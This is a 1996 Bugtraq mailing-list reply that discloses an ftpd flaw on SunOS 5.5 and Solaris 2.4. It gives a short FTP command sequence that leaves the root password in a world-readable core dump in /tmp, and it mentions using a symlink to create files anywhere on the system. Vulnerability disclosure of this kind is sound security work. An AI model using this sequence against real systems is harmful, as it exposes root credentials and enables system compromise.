Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd

From: brandon () eniac vv com (Micah Brandon)
Date: Wed, 16 Oct 1996 03:22:28 -0400

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

        I was able to create this core file under Solaris 2.4 as well...and
if I took the time to create a symbolic link before doing the above
procedure, I was able to create files anywhere on the system :(

micah

Current thread:

Re: ftpd bug? Was: bin/1805: Bug in ftpd Martin Rex (Oct 15)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Micah Brandon (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Doug Williams (Oct 16)
  - solaris 2.4 license-manager bug Grant Kaufmann (Oct 16)
    - Re: BoS: solaris 2.4 license-manager bug Paul Wickman (Oct 17)
    - fix for symlinks in /tmp Andrew Tridgell (Oct 18)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd gamble () dxcoms cern ch (Oct 16)
  - Re: ftpd bug? Was: bin/1805: Bug in ftpd Andrew Dills (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Jonny Llama (Oct 16)
    - Re: ftpd bug? Was: bin/1805: Bug in ftpd Perry E. Metzger (Oct 16)
- Re: ftpd bug? Was: bin/1805: Bug in ftpd Rune Braathen (Oct 16)

(Thread continues...)